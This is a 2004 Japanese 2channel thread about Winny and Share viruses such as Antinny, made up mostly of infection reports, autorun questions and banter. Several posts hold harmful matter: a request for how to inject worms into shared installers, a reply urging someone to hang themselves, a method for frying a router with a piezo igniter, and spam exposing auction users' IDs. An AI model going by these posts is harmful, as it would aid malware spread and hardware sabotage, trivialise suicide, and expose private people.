いや、お前にとって重要で無いなら、いちいち絡んでくるな。214+を無視リストでも入れとけ
これはとても重要なことなのだ。




220 :[名無し]さん(bin+cue).rar:04/09/18 00:48:41 ID:Nip6NdZR
しばらくスルーで行きましょ。みなさま

221 :[名無し]さん(bin+cue).rar:04/09/18 00:49:54 ID:canoSZ1e
頭のイタイやつがでてきたな・・・・

222 :[名無し]さん(bin+cue).rar:04/09/18 00:53:40 ID:gYO8D+ez
普通にsageとけば答えてくれたかもしれない人を敵に回す行為
sage推奨スレでは逆効果だわな

223 :[名無し]さん(bin+cue).rar:04/09/18 00:54:57 ID:+1P/CFMW
やっぱし、TVや雑誌の影響かね・・・

224 :[名無し]さん(bin+cue).rar:04/09/18 00:55:31 ID:qF+5z9DN
マジレスしてしまったことを、後悔∧‖∧

225 :[名無し]さん(bin+cue).rar:04/09/18 00:56:49 ID:canoSZ1e
夏は終わったと思ってたんだがな・・・・・

226 :[名無し]さん(bin+cue).rar:04/09/18 01:03:02 ID:vxklo668
WinnyやMXやらShareに流れてるファイルに
ワームを混入させたいんですが、
どうやって既存のインストールプログラムに
サブルーチンコールを付与すべきでしょうか?

デバッガを使って無理矢理混入したウィルスタイプのライブラリに
途中分岐でリンクさせたけど
うまくメインルーチンにアドレスが返されませんでした。

227 :[名無し]さん(bin+cue).rar:04/09/18 01:05:26 ID:jyczkZa1
チンコがどうしたって?

228 :[名無し]さん(bin+cue).rar:04/09/18 01:08:15 ID:canoSZ1e
さらに頭のイタイやつが現れたな・・・・もう寝よう。

229 :[名無し]さん(bin+cue).rar:04/09/18 01:10:05 ID:ftgx9+dl
>>227のチンコには負けましたって事らしいよ。やったな>>227

230 :[名無し]さん(bin+cue).rar:04/09/18 01:12:39 ID:hGSRUg2U
上げときますね。

231 :[名無し]さん(bin+cue).rar:04/09/18 01:28:29 ID:dM+zp+57
ageんな糞ヴォケ滓

232 :[名無し]さん(bin+cue).rar:04/09/18 01:28:59 ID:TCVIzHRJ
なんだかいつのまにか
身に覚えのない物がウプされてた
いろいろ調べていると、ユーザー名のtxtがあったんで
開いてみると「おっす、おらユーザー名(ry
ってなのがでてきた
あ〜これがタマキンか〜

233 :[名無し]さん(bin+cue).rar:04/09/18 01:36:19 ID:dQoN/UbI
>>232
オメw

234 :[名無し]さん(bin+cue).rar:04/09/18 02:10:04 ID:TCVIzHRJ
>>233
どもw

235 :[名無し]さん(bin+cue).rar:04/09/18 02:48:31 ID:qlqpSio4
会社のPCぶっこわしたい
ウイルスください

236 :[名無し]さん(bin+cue).rar:04/09/18 02:49:53 ID:hzPBJ0QF
>>235
ウイルスなんか入れるより、会社で首つった方が効果あるよ。

237 :[名無し]さん(bin+cue).rar:04/09/18 03:03:37 ID:aokByHeF
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040917/150103/
これの強烈な奴を雑誌に忍ばせて流してください

238 :[名無し]さん(bin+cue).rar:04/09/18 03:05:06 ID:xTYBz+Io
>>236
それはもう試した
スルーされた

239 :[名無し]さん(bin+cue).rar:04/09/18 05:32:19 ID:y+faMCzy
>>238
キンタマ晒しながらLANケーブルで実行しないからだよ。
ノートン先生に黙って削除されたんだろ。

破壊するのは意外と簡単で、100円ライターとかの着火装置(圧電素子)
をLANケーブルに直結して、数回バチバチやるといい。ルータが死ぬ。

240 :[名無し]さん(bin+cue).rar:04/09/18 05:42:31 ID:5B8C5U3I

http://openuser7.auctions.yahoo.co.jp/jp/user/torajirou3391?
★DVD6枚★同人誌5100冊以上+HCG15.000枚+エッチ動画☆送料込!

▼悲惨な落札者一覧(無論個人データは販売されます)▼
http://rating7.auctions.yahoo.co.jp/jp/show/rating?userID=rei_asuka_saiko
http://rating3.auctions.yahoo.co.jp/jp/show/rating?userID=xz9994abx&
http://rating7.auctions.yahoo.co.jp/jp/show/rating?userID=kazutake32001&
http://rating9.auctions.yahoo.co.jp/jp/show/rating?userID=lexsusys&
http://rating10.auctions.yahoo.co.jp/jp/show/rating?userID=ryota52045204&
http://rating10.auctions.yahoo.co.jp/jp/show/rating?userID=swallow53jp
http://rating10.auctions.yahoo.co.jp/jp/show/rating?userID=beru0710&
http://rating6.auctions.yahoo.co.jp/jp/show/rating?userID=kanon_one_air2000&
http://rating9.auctions.yahoo.co.jp/jp/show/rating?userID=dwwjq768&
http://rating4.auctions.yahoo.co.jp/jp/show/rating?userID=naitou1253&

241 :[名無し]さん(bin+cue).rar:04/09/18 06:13:30 ID:R7QYZmDs
上げときますね。

242 :[名無し]さん(bin+cue).rar:04/09/18 12:24:58 ID:bfHqPWcI
アップフォルダないのに
「アップフォルダ個数」が1になってる……。
これいかに?

243 :[名無し]さん(bin+cue).rar:04/09/18 12:27:30 ID:TgLPYUrm
>>242
BBSフォルダの分

244 :242:04/09/18 12:32:14 ID:bfHqPWcI
そっか。今までもそうだったのに気づかなかっただけか。スマソ

245 :[名無し]さん(bin+cue).rar:04/09/18 12:48:05 ID:irPYa9lh
(・∀・)

246 :[名無し]さん(bin+cue).rar:04/09/18 13:07:42 ID:hokjhQog
>>242
(・∀・)コンニチハ!!

247 :[名無し]さん(bin+cue).rar:04/09/18 13:19:29 ID:1ZkQdLkq
(・∀・)

248 :242:04/09/18 13:21:08 ID:bfHqPWcI
こんにちは。でももう出かけないと。
バイバイ

249 :[名無し]さん(bin+cue).rar:04/09/18 13:55:20 ID:TPrHK7Go
ゲーム等のマウントは、Autorunを切っておけばウィルスの危険性は無いですか?

250 :[名無し]さん(bin+cue).rar:04/09/18 14:17:55 ID:Nip6NdZR
etfW40cxのおかげで一晩にして超糞スレに・・・

251 :[名無し]さん(bin+cue).rar:04/09/18 14:34:02 ID:BjPWCEhd
>>249
マウントするだけでインスコしないんなら大丈夫でないの?

252 :[名無し]さん(bin+cue).rar:04/09/18 14:42:07 ID:APQAO7oD
>>250
奴は友達が一人もいないかわいそうなマザコンなんだよ


253 :[名無し]さん(bin+cue).rar:04/09/18 14:43:44 ID:mt3AgFOP
いつも不思議なんだが。
autorun が bat とかでスグわかるなら別だが、
exe の場合はリスクがありすぎだろ。

setup.exe を実行するわけだろ。
ワクチンソフトも効かないような可能性がでかいし。

エロの欲望は autorun なんか切っても無駄無駄無駄

254 :[名無し]さん(bin+cue).rar:04/09/18 14:52:30 ID:Yo5MmgB8
なんか*.mbx、NNdbase.txt,、attachというフォルダ、等がはいったファイルを拾ってしまった。
丸見えだし。 滋賀県立大の中の人だね。

ウイルス本体が入ってないから何に感染したのかわからんが。
おそろしい…

255 :[名無し]さん(bin+cue).rar:04/09/18 15:24:51 ID:aokByHeF
http://www.itmedia.co.jp/enterprise/articles/0409/18/news004.html
雑誌にこれを入れてください

256 :[名無し]さん(bin+cue).rar:04/09/18 15:37:54 ID:yeAqUCJ4
セキュリティ更新プログラムを?

257 :[名無し]さん(bin+cue).rar:04/09/18 18:31:52 ID:61j5ADx5
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040917/150103/
これの強烈な奴を雑誌に忍ばせて流してください

258 :[名無し]さん(bin+cue).rar:04/09/18 18:51:59 ID:w9ErVn4c
元々の糞レスばかりの厨房スレ
が一段と糞化してるなw

















くせー

259 :[名無し]さん(bin+cue).rar:04/09/18 19:15:19 ID:cC1rHeRO
>>218
>>231
漏れら極悪非道のageブラザーズ!
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J



260 :[名無し]さん(bin+cue).rar:04/09/18 20:25:55 ID:8nTqDf49
漏れら極悪非道のなんだとブラザーズ!
今日もネタもないのにビームしてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧   ∧_∧    なんだと
 (@u@∩)(★_★)    
 (つ  丿 (   ⊂) なんだと
  ( ヽノ   ヽ/  )   
  し(_)   (_)J     なんだと

261 :[名無し]さん(bin+cue).rar:04/09/18 20:58:55 ID:vOHyvMw3
>>260
何よその顔文字?ふz(ry

262 :[名無し]さん(bin+cue).rar:04/09/18 21:08:03 ID:AsLaVTFg
糞スレ万歳。

263 :[名無し]さん(bin+cue).rar:04/09/18 21:54:11 ID:T0VDuWXt
このスレの存在意義はテンプレと亜種の報告ぐらい
「感染したんだけど、どうすればいい?」なんて聞かれても
再インスコとしか答えらんねえし

264 :[名無し]さん(bin+cue).rar:04/09/18 22:00:29 ID:hzPBJ0QF
とりあえずおろおろしとけとしか言いようがないよな

265 :[名無し]さん(bin+cue).rar:04/09/18 22:45:24 ID:oNqwH7kJ
んだな
PC環境かいたり症状書いたりして対処方法聞くのはわかるが
感染したんだけど、どうすればいい?
とか答えようない

266 :[名無し]さん(bin+cue).rar:04/09/18 22:45:35 ID:a8Xne7kS
 ヽ(・ω・)/   ズコー
\(.\ ノ


267 :[名無し]さん(bin+cue).rar:04/09/18 22:57:22 ID:mt3AgFOP
なにマジメに糞スレとかいってんだよ。

このスレはウイルスにかかったやつを見て、馬鹿だなぁ〜とか、見て楽しむスレだよ。

268 :[名無し]さん(bin+cue).rar:04/09/18 23:01:43 ID:Nip6NdZR
>>267
正解。

269 :[名無し]さん(bin+cue).rar:04/09/18 23:12:32 ID:mt3AgFOP
>>268
おれも、自分がヌルポースを踏むまでそうおもてたよ。
しかしな・・・、そうオレが馬鹿だったんだ。

お前らも注意しろよ。





ってのも、楽しむスレでもあるんだよ

270 :[名無し]さん(bin+cue).rar:04/09/18 23:14:48 ID:JZaY3Lu3
糞というより、
専門知識の無い厨房が答えられなくて煽るスレだろ。
解決方法など、ここで聞く方が愚か。
専門知識はセキュリティスレに聞けと。

271 :[名無し]さん(bin+cue).rar:04/09/18 23:20:51 ID:HPvW3N9F
2ちゃんって良くも悪くも普通の人が集まるところなんだなと思う

272 :[名無し]さん(bin+cue).rar:04/09/18 23:41:01 ID:gYO8D+ez
昨日のアゲ嵐が潜伏してるのかしらね

273 :[名無し]さん(bin+cue).rar:04/09/18 23:42:44 ID:vOHyvMw3
毎晩ここを酒のつまみにしている。

>>270
> 専門知識の無い厨房が答えられなくて煽るスレだろ。
スレタイ100回音読して、書き込む前にママンにこれで良いかを聞いてから書き込め。

274 ::04/09/19 00:00:28 ID:Bx3aTSht
あらら、見事に>>270の言うままの
厨房あおりレスw

多少皮肉っぽいが、>>270>>271
言ってることに同意


275 :[名無し]さん(bin+cue).rar:04/09/19 00:18:24 ID:WdqXQNJH
つーかほんとに解決したかったらsymantecにでも行けって話ですよ。
専門家でもないのに感染したことのないウィルスの事なんか
知るかってーの。

276 :[名無し]さん(bin+cue).rar:04/09/19 00:19:03 ID:JtjLyOZd
セキュ板にいって質問したら「この割れ厨が! ダウソ板に還れ」
で終わるような希ガス 

277 :[名無し]さん(bin+cue).rar:04/09/19 00:35:20 ID:Aq2R3Mcx
んでもって、この板にも超がつく位のエキスパートも居ないわけじゃないんだけど、
そんな連中はこんなスレで親切にはしてくれないんだ。

そりゃまあ、開発側のスタッフなんだから仕方がない。あきらめたら?

278 :[名無し]さん(bin+cue).rar:04/09/19 00:59:42 ID:oFUPut4A
>>277
そうだよな、ウイルス製造側が新しいのが引っかかったのをみて、
俺のだって、笑ってそう。
ああいうの作るやつは、注目されたくて作るところがありそうだから。

279 :[名無し]さん(bin+cue).rar:04/09/19 01:01:06 ID:WdqXQNJH
質問テンプレを感染ウィルス報告テンプレに改名するのはどうだろう。


280 :[名無し]さん(bin+cue).rar:04/09/19 01:02:39 ID:wfsjdt9U
正直、ウィルス対策に専門知識なんてほとんど関係ない
虫を解析するわけじゃないし

情報のアンテナ広げるスレだし

虫の専門知識?それはそれでいやだな

281 :[名無し]さん(bin+cue).rar:04/09/19 01:16:30 ID:2kFGdqSe
血飛沫ぬるぽのテンプレ追加きぼんぬ。

…今、致死武器ぬるぽと出た…。
確かにPCが死に至る武器だが…。

282 :[名無し]さん(bin+cue).rar:04/09/19 01:21:56 ID:ItkA5NVA
>>281
新種じゃないだろ?今までのとなんか違うのか?
だったらテンプレで症状あげてみ

283 :[名無し]さん(bin+cue).rar:04/09/19 01:27:11 ID:ItkA5NVA
shareの方では新種がでてるようだが、やっぱりスレ違い?

284 :[名無し]さん(bin+cue).rar:04/09/19 01:29:48 ID:2kFGdqSe
>>282
新種つーか、亜種だろ。
テンプレのどこにも、血飛沫とか、女性の悲鳴とか、
血文字ぬるぽとか、ファイルを拡張子でランダムに削除なんて書いてあんだよ。

285 :[名無し]さん(bin+cue).rar:04/09/19 01:29:52 ID:ItkA5NVA
スマン、違った。
だたのスクリプトですか

286 :[名無し]さん(bin+cue).rar:04/09/19 02:04:12 ID:jqJIBzts
>>281のはスクリーンセーバーの亜種じゃないの。
出始めた当時にもそのパターン報告もあった気がする。


287 :[名無し]さん(bin+cue).rar:04/09/19 02:15:27 ID:lmFEnXHd
>>284
それはただのキンタマだろ?

288 :[名無し]さん(bin+cue).rar:04/09/19 02:22:07 ID:DmoEK/0L
ガッ

289 :[名無し]さん(bin+cue).rar:04/09/19 02:23:36 ID:MWTG7w0F
>>281
血しぶきが確かに画面の一部に出ていた
が、ほって置いた。
しばらく、15分ぐらい手元を離れて戻ってみると、画面全体が血とぬるぽ文字のスクリーンセーバーで覆われていた。
で、すぐにj重要なファイルのいくつがが見つからない旨の警告がでたが、システム入れ替え予定があったので、ほって置いた。
とりあえず、再起動したが立ち上がらなくなった。HDフォーマットされる。


290 :[名無し]さん(bin+cue).rar:04/09/19 02:35:34 ID:ewrk9kPh
今更感染したのかい
それだけの症状でてるのに放置してたんだからどうしようもない
諦めがついてよかったじゃないか

291 :289:04/09/19 02:41:52 ID:MWTG7w0F
>290
日本語文理解できてますか?

292 :[名無し]さん(bin+cue).rar:04/09/19 02:43:38 ID:AnuRBtiP
俺には明かな症状が出てるPCを放置する>>289の心境が判らない

ま、肴にはなるがな

293 :[名無し]さん(bin+cue).rar:04/09/19 02:44:53 ID:Fz0Pi/GH
    |┃三    ,ィ, (fー--─‐- 、、
    |┃.    ,イ/〃        ヾ= 、
    |┃   N {                \
    |┃  ト.l ヽ               l
 ガラッ.|┃ 、ゝ丶         ,..ィ从    |
    |┃  \`.、_    _,. _彡'ノリ__,.ゝ、  |     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    |┃三 `ゞf‐>n;ハ二r^ァnj< y=レヽ    <  話は聞かせてもらったぞ!
    |┃.    |fjl、 ` ̄リj^ヾ)  ̄´ ノ レ リ     |   人類は滅亡する!
    |┃三  ヾl.`ー- べl,- ` ー-‐'  ,ン       \____________
    |┃      l     r─‐-、   /:|
    |┃三     ト、  `二¨´  ,.イ |
    |┃     _亅::ヽ、    ./ i :ト、

294 :[名無し]さん(bin+cue).rar:04/09/19 03:09:50 ID:WdqXQNJH
な(ry

295 :[名無し]さん(bin+cue).rar:04/09/19 03:14:35 ID:2kFGdqSe
>>287
駄目だこりゃ┐(´д`)┌ ヤレヤレ

296 :[名無し]さん(bin+cue).rar:04/09/19 03:32:57 ID:bNeuQHMh
>>295
何がヤレヤレだか知らんが感染方法が変わってない以上
いちいちテンプレに載せる必要はないと思う

297 :[名無し]さん(bin+cue).rar:04/09/19 03:42:43 ID:2kFGdqSe
>>296
感染方法が変わってなくても、症状違うだろ。
おまいの中では、ファイル流出とファイル破壊(削除)はイコールなのか?

298 :[名無し]さん(bin+cue).rar:04/09/19 03:51:57 ID:WdqXQNJH
もういいじゃんなんでも。
地雷を踏んだらさようならだ。
黙って再インストールしろよ。

299 :[名無し]さん(bin+cue).rar:04/09/19 03:55:29 ID:b0B7ZDFC
ウィルス踏んだ奴を藁うためのクソスレらしいから、
有益な情報天ぷら追加なんかありえねーって話なんだろ。

ここより、ダボークリックスレの方がマシだなw

300 :[名無し]さん(bin+cue).rar:04/09/19 04:24:28 ID:WdqXQNJH
地雷を踏んだらさようなら
ってフレーズを使いたかっただけなんだけどな。

301 :[名無し]さん(bin+cue).rar:04/09/19 04:29:40 ID:AnuRBtiP
ファイル破壊はAntinny.Aから標準装備なんじゃねーの?
初期の頃、どっかのスレで解析屋が警告してたハズだが

少なくともAntinny.G以降は流出&破壊がデフォなんだから、
症状は概ねイコールだと思うんだが

踏んだこと無いからよー知らんけど

302 :[名無し]さん(bin+cue).rar:04/09/19 05:12:24 ID:I0wY0eJ8
ファイル流出して再インスコするんだ
( ´,_ゝ`)プッ

303 :[名無し]さん(bin+cue).rar:04/09/19 07:22:08 ID:ewrk9kPh
テンプレが不満なら>>297がテンプレ案をつくってみればいい

キンタマはもう枯れてて、新しくできた亜種でもなくキンタマの典型的な症状なので
今更テンプレ変更の必要を感じなかっただけだ

いいテンプレ案出せばそれを使えばいいだけの話だし、どんどん出してくれてかまわんよ

304 :[名無し]さん(bin+cue).rar:04/09/19 09:56:33 ID:oB2+7fit
キンタマにかんせんしてしまいました。 
再インスコのやり方がよくわからないんですが
初心者は店とかで頼んだ方が安全ですかね?

305 :[名無し]さん(bin+cue).rar:04/09/19 10:07:59 ID:oB2+7fit
変換し忘れて釣りっぽくなってしまった・・
スマソ

306 :[名無し]さん(bin+cue).rar:04/09/19 10:24:34 ID:7VmS7fzT
>>304
PC初心者
http://pc6.2ch.net/pcqa/

307 :[名無し]さん(bin+cue).rar:04/09/19 10:28:53 ID:SaANs3iW
_________________________
    <○ノ
     ‖ 
     くく
ヤバいぞ!このスレは崩壊する!
オレが止めているうちに他スレへ逃げろ!
早く!早く!オレに構わず逃げろ!

308 :[名無し]さん(bin+cue).rar:04/09/19 11:04:21 ID:I0wY0eJ8
最近ny始めて
一週間ほどお試しノートン先生無しでやってたら
Antinnyとかが合計6個見ツカッタ━━(゚∀゚)━━

309 :[名無し]さん(bin+cue).rar:04/09/19 11:07:24 ID:wfsjdt9U
>>308
楽しそうだな、オイ

310 :[名無し]さん(bin+cue).rar:04/09/19 11:09:08 ID:AsaGSluL
>308
がんがれYO!

311 :[名無し]さん(bin+cue).rar:04/09/19 11:28:21 ID:I0wY0eJ8
ここで問題なのは、
>>302に「ウィルスに感染するなんてアフォだな。」
とか、考えながら煽ってる俺が居ることだ。

          ヽ●ノ  ウヒョーーー!!
           /
          ノゝ

312 :[名無し]さん(bin+cue).rar:04/09/19 13:18:42 ID:akFkQzzd
>>308ダボークリックスレに相応しい人材ハケーン!!

313 :[名無し]さん(bin+cue).rar:04/09/19 13:58:41 ID:LDCKOO6F
>>307
バカ野郎!お前をおいていける訳ねえだろ!

314 :[名無し]さん(bin+cue).rar:04/09/19 14:10:58 ID:X3LHpMAQ
>>307
そお? 悪いね、じゃ。(・∀・)ノシ

315 :[名無し]さん(bin+cue).rar:04/09/19 14:14:09 ID:+PHRbRxu


_________________________


316 :[名無し]さん(bin+cue).rar:04/09/19 14:16:03 ID:J0kQ+dpj
もういい

317 :[名無し]さん(bin+cue).rar:04/09/19 14:19:17 ID:c7bdOKz4
質問してくるのはいいが、回答者が
「テンプレ嫁・フォーマット使わせろ」って言わなくなってきたのが問題かもな。

318 :[名無し]さん(bin+cue).rar:04/09/19 14:22:03 ID:hy/B0GCt
つーかこのスレは作者が(・∀・)ニヤニヤするためのスレでもある。
そうに違いない。

319 :[名無し]さん(bin+cue).rar:04/09/19 14:50:56 ID:k+UHX8l3
すいません、うっかりfolder拡張子クリックしてしまったんですが
再起動してないんで今できること教えて欲しいです。
【使用OS】XP Home
【WindowsUpdateしてるか】SP以外
【AntiVirusは】Norton
【ちゃんとUpdateしてるか】最新版です
【スキャンした結果】反応なし

320 :[名無し]さん(bin+cue).rar:04/09/19 14:51:33 ID:WdqXQNJH
「テンプレ嫁・フォーマット使わせろ」

321 :319:04/09/19 14:55:52 ID:k+UHX8l3
えっと、再起動前なのでって事なのですが…
再起動してなくても症状はでますか?

322 :[名無し]さん(bin+cue).rar:04/09/19 15:14:38 ID:+tu19zN+
>>319
もうない

323 :[名無し]さん(bin+cue).rar:04/09/19 15:29:43 ID:C5wzmSxL
ていうか.folder単体では何も出来ないぞ

324 :319:04/09/19 15:38:14 ID:k+UHX8l3
解凍したフォルダの中に同フォルダへリンクしてる.folderというのがありまして、
キンタマウイルスじゃないか、と思って質問しました。
再起動前ではいずれの症状も出ていませんが…

325 :[名無し]さん(bin+cue).rar:04/09/19 15:40:37 ID:waEywyBB
キンタマなら、ノートンで余裕で除去できるべなもし。

326 :[名無し]さん(bin+cue).rar:04/09/19 15:53:54 ID:k+UHX8l3
>>325
ありがとうございます、現在検索中です。
検出されなかったら未感染ってことですかね。

327 :[名無し]さん(bin+cue).rar:04/09/19 15:59:54 ID:mNBULGYJ
DaemonToolsの自動起動って切れませんか?
凄い怖いんですけど、これ

328 :[名無し]さん(bin+cue).rar:04/09/19 16:17:36 ID:knV/qYFP
>>327
板違い

329 :[名無し]さん(bin+cue).rar:04/09/19 18:35:45 ID:DxZhOzQ8
http://tmp4.2ch.net/test/read.cgi/download/1095299769/190

nyじゃないけど、shareのウイルスって報告した方がいいの?


330 :[名無し]さん(bin+cue).rar:04/09/19 19:14:33 ID:cgXSiKT9
NYで落としたEXCELのゴミファイル間違えて開いたのが原因と思われるウイルスに
感染してセーフモードですらd346.busの読み込みに失敗し起動すらしない状態です。
通常起動時はブルーバックで英語でウイルスに感染してるからディスクチェックする
か新しいHDDにしろみたいな画面でストップ。ちなみにOS再インストも不可。
ちなみに感染ファイルの内容は自衛隊の一日のスケジュールみたいなもの。
有名なウイルスかどうかと対処方有れば教えてください

331 :[名無し]さん(bin+cue).rar:04/09/19 19:21:17 ID:c7bdOKz4
>>330
OSインストール時にフォーマットするしかないんじゃない?

332 :[名無し]さん(bin+cue).rar:04/09/19 19:32:58 ID:wfsjdt9U
>>327
切れるよ
OSの問題なのでぐぐれ

333 :[名無し]さん(bin+cue).rar:04/09/19 20:08:51 ID:MCWvo/8d
>>329
報告不要だろ、だってここnyのスレだから。

334 :[名無し]さん(bin+cue).rar:04/09/19 20:18:39 ID:Tt0cd+Jp
先ほどシステムが故障してXPを再インストールしたのですが、
保存していたテキストファイルやワードファイルを開くとすべて277KBの
  ∧_∧
 ( ´∀`)< ぬるぽ

になっていました。これはもう直らないのでしょうか?
ファイルのプロパティだけ見ると、容量分の数字は表示されるのですが、
開くと全部ぬるぽです。

335 :[名無し]さん(bin+cue).rar:04/09/19 20:19:23 ID:RH/I0MfQ
>277KBの  ∧_∧
>       ( ´∀`)< ぬるぽ

余程でかいAAなんだろうな

336 :[名無し]さん(bin+cue).rar:04/09/19 20:21:42 ID:MCWvo/8d
>>334
あきらめて、OSクリーンインストしろ。

337 :[名無し]さん(bin+cue).rar:04/09/19 20:36:39 ID:pAdpWkD6
>>327
テンプレに自動実行の切り方が載ってる。

338 :[名無し]さん(bin+cue).rar:04/09/19 20:50:22 ID:AnuRBtiP
全角age厨にマジレスすんのもアレだが

>>334
諦めれ

339 :[名無し]さん(bin+cue).rar:04/09/19 21:02:20 ID:hy/B0GCt
>>327
当然もう解決しただろうけど一応。
仮想ドライブだろうと実ドライブだろうと、Autorunの切り方は同じですから。天ぷら参照。

>>330
それって自衛隊流出ファイルをまとめたと見せかけたただの偽ファイルじゃないか?
エクセルのアイコンをしたexeだったらそれ。
Autorun+batのやつと同じでレジストリ&Cドラ全削除とかされるやつがあった希ガス。

340 :[名無し]さん(bin+cue).rar:04/09/19 21:44:12 ID:dib5hncW
映画】 エッチの国のアリス (日本語字幕).avi632e8f0a4691369457d465e5921f15c5
こいつが入っているフォルダ開くとexplorerのCPU占有率99%になる。なんで?

341 :[名無し]さん(bin+cue).rar:04/09/19 22:10:11 ID:XDHI+ZVl
>>340
それはexplorerの素敵な仕様だからでは?
CPU100%状態だとファイル自体、捨てられないし・・・
コマンドプロンプトで捨てられるんだっけ?

342 :[名無し]さん(bin+cue).rar:04/09/19 22:11:31 ID:c7bdOKz4
>>341
捨てられないよ。止まるの待つしかない。

343 :[名無し]さん(bin+cue).rar:04/09/19 22:18:09 ID:WdqXQNJH
タスクマネジャーのプロセスで終了させてまた起動させればいい

344 :[名無し]さん(bin+cue).rar:04/09/19 22:20:55 ID:dib5hncW
応答なしで強制終了 別のファイラーで捨てました。そしたら 直ったw・・・・なんだったんだろう??

345 :[名無し]さん(bin+cue).rar:04/09/19 23:20:23 ID:kUL3WDzN
explorerがaviの情報を必死に取得しようとしてるだけ

346 :[名無し]さん(bin+cue).rar:04/09/19 23:57:06 ID:DmdpP6EI
daemonの話題はスレ違いだって言ってんだろカス共。
お前らも質問者と同じでテンプレ読んで100年ROMれ

347 :[名無し]さん(bin+cue).rar:04/09/20 00:13:46 ID:3C8RVaA7
テンプレにも載ってるし、ウイルス対策としては初歩の初歩。
実のある報告をするために必要な措置だし、このくらいのことで煽るの
はどうかと。

まあ、テンプレも熟読せずに質問する厨房が諸悪の根源だがな。

348 :[名無し]さん(bin+cue).rar:04/09/20 00:39:46 ID:4KTwK7jG
外見上は生きている物が魂を持っているかという疑惑
反対に、魂を持った者が本当に生きているのかという疑惑

完全なハードウェアを装備したOSという幻想こそが諸悪の根源なんだよ

349 :[名無し]さん(bin+cue).rar:04/09/20 00:42:05 ID:SiszVWzf
ageるお前が諸悪の根元

350 :[名無し]さん(bin+cue).rar:04/09/20 01:01:45 ID:zwYNkIdi
>>329
こんなの実行したやつがあんなにいるのか?

351 :[名無し]さん(bin+cue).rar:04/09/20 01:57:55 ID:p7IRQdo2
やっべなにこれ
             /ヽ       /ヽ
            / ヽ      / ヽ
  ______ /U ヽ___/  ヽ
  | ____ /   U    :::::::::::U:\
  | |       // ___   \  ::::::::::::::|
  | |キンタマ   |  |   |     U :::::::::::::|
  | |      .|U |   |      ::::::U::::|
  | |       | ├―-┤ U.....:::::::::::::::::::/
  | |____ ヽ     .....:::::::::::::::::::::::<
  └___/ ̄ ̄      :::::::::::::::::::::::::|
  |\    |           :::::::::::::::::::::::|
  \ \  \___      ::::::

352 :[名無し]さん(bin+cue).rar:04/09/20 04:03:48 ID:xXZda9FS
◆◆SHAREウイルス発生[ Safe Share ver0.2 ] ◆◆
http://news13.2ch.net/test/read.cgi/news/1095607197/

あっちにもスレ建ったな。

353 :[名無し]さん(bin+cue).rar:04/09/20 13:34:18 ID:01dHSg1r
キンタマ感染しても、ポート警告が多い等の理由でポート0設定にしてたら個人情報は流出しないのでしょうか。どなたか教えてください。

354 :[名無し]さん(bin+cue).rar:04/09/20 13:38:41 ID:UJu/s5IU
釣られてやんねーyo

355 :[名無し]さん(bin+cue).rar:04/09/20 13:52:59 ID:yI1sC6g8
>>353
正解
あんた神だね。

356 :[名無し]さん(bin+cue).rar:04/09/20 14:04:06 ID:N2iAbA40
【GBA】(GBA ツール)ポケットモンスタールビー&サファイア 時間変更コード(詳しい説明付き)これでやっと夜がきます.zip
サイズ51.851  2222a20a7e6851321f070b0c907a642d

上記をDLしてウイルスチェックしたのち、+説明.txtファイル(exeは付いてませんでした)を
開いたのですが、開けないみたいなエラーが出たので、極窓で確認したら判別不能と出たので
PC全体のウイルスチェックをしたのち、PC再起動させWinnyを起動させたら
1秒もたたずに落ちてしまいました。何度やっても同じで、ノード情報は全て消えてしまいました。
それ以外の情報は平気でした。
上書きだけでは復旧できなくて再度Winnyを入れ直したのですが、ウイルスでしょうか?
他にもファイルがあったのですが、いじってません。
一応報告しておきます。





357 :[名無し]さん(bin+cue).rar:04/09/20 14:08:24 ID:01dHSg1r
キンタマはUpFolder.txtを書き換えるけど
port設定までは変えないということですか。

358 :[名無し]さん(bin+cue).rar:04/09/20 14:18:37 ID:01dHSg1r
UNTINNYウイルスに感染した場合、ポート0にすると、
他人にウイルスファイルをばらまかなくてすむのでしょうか。


359 :[名無し]さん(bin+cue).rar:04/09/20 14:31:12 ID:pZ2jUMD0
http://tmp4.2ch.net/test/read.cgi/download/1095597120/98

マルチ乙>>358

360 :[名無し]さん(bin+cue).rar:04/09/20 14:57:33 ID:SiszVWzf
見ろ
不用意にageるから肴にすらならねー有象無象が寄ってきたじゃねーか

361 :[名無し]さん(bin+cue).rar:04/09/20 14:59:47 ID:01dHSg1r
>>355
もう少し詳しく教えていただけませんか。

362 :47:04/09/20 16:40:28 ID:pmh0I04D
                 _,,. -−- ,,_ 
             ,.-‐'''"       ヽ 
             ノ             ヽ
            /        ,,,_,_    ヽ 
            {  ,vリjh!リjh!(   ヽ,   }
            }  / ,; ニ=  =ニミ;、i  {
            { j  ,.ェュ ,  { rtェ 、 i ノ
           { Y      ミ       Yリ
           !|    y.-,_-)、    |ノ   
             '!   ノ _, u 、ヽ   !     
             !    ''ニ' '    !  
              ト、  _,,,,,,    イ     
┌─────┐    /|   −-- −'  |ヽ, 
│ 金子 勇   | ー'''{  |      ノ    | /''ー
├─────┴────────────────────────
│『AntiShare』の開発を要請する。
└──────────────────────────────

363 :[名無し]さん(bin+cue).rar:04/09/20 16:44:19 ID:joujhvUo
ウイルスの鑑定などはここでいいのでしょうか?
できれば下記の鑑定をお願いします。

!!(一般コミック) [二ノ宮知子] のだめカンタービレ 第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2

中身はこの漫画のJPEGファイルのほか、
「.exe」「ReadMe.html」「.folder」の三種のファイル。
UNTINNYでおなじみの組み合わせですが、当方のNortonSystemWorks2004が反応
しなかったので、新しい亜種ができたのかと。
(踏んでないので分かりませんが...)
また、JPEGファイルがシステムファイル扱いになっており、
フォルダオプションの「システムファイルを表示する」設定していないと見えませんでした。

364 :[名無し]さん(bin+cue).rar:04/09/20 16:45:02 ID:MjkRRq7r
>>358
まるちかまあいいや
